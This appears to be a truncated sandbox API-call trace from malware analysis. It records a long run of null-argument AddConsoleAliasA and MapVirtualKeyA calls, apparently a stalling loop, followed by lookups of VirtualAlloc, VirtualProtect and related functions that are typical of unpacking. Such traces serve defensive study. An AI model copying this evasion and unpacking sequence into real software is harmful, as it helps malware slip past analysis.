0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.646] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.646] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.647] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.647] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.648] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.648] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.649] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.649] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.650] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.650] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.651] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.651] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.652] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.652] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.653] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.653] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.653] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.653] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.653] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.653] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.653] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.653] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.653] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.653] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.653] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.653] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.653] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.653] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.653] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.653] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.653] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.653] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.653] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.653] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.653] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.653] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.653] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.653] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.653] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.653] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.653] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.653] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.654] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.654] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.655] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.655] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.655] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.655] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.655] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.655] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.655] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.655] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.655] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.655] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.655] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.655] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.655] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.655] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.655] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.655] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.655] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.655] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.655] AddConsoleAliasA (Source=0x0, Target=0x0, ExeName=0x0) returned 0 [0036.655] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0036.658] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0036.658] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0036.658] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0036.658] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0036.658] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0036.658] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExA") returned 0x76963861 [0036.658] 